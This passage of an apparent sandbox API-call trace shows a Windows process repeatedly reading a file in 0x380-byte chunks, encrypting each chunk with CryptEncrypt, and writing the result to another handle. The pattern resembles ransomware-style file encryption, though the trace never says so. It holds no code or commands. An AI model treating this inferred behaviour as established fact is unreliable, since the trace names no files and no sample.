lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.595] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.595] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.595] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.595] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.595] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.595] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.595] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.595] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.595] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.595] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.595] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.595] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.595] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.595] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.596] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.596] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.596] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.596] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.596] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.596] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.596] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.596] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.596] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.596] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.596] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.596] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.597] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.597] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.597] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.597] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.597] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.597] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.597] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.597] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.597] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.597] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.597] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.597] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.597] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.597] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.598] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.598] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.598] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.598] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.598] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.598] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.598] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.598] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.598] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.598] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.599] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.599] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.599] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.599] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.599] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.599] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.599] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.599] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.599] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.599] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.599] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.599] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.600] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.600] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.600] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.600] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.600] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.602] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.602] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.602] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.602] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.602] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.602] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.602] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.603] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.603] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.603] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.603] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.603] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.603] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.603] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.603] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.603] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.603] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.603] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.603] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.603] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.603] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.603] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.604] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.604] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.604] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.604] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.604] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.604] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.604] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.604] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) 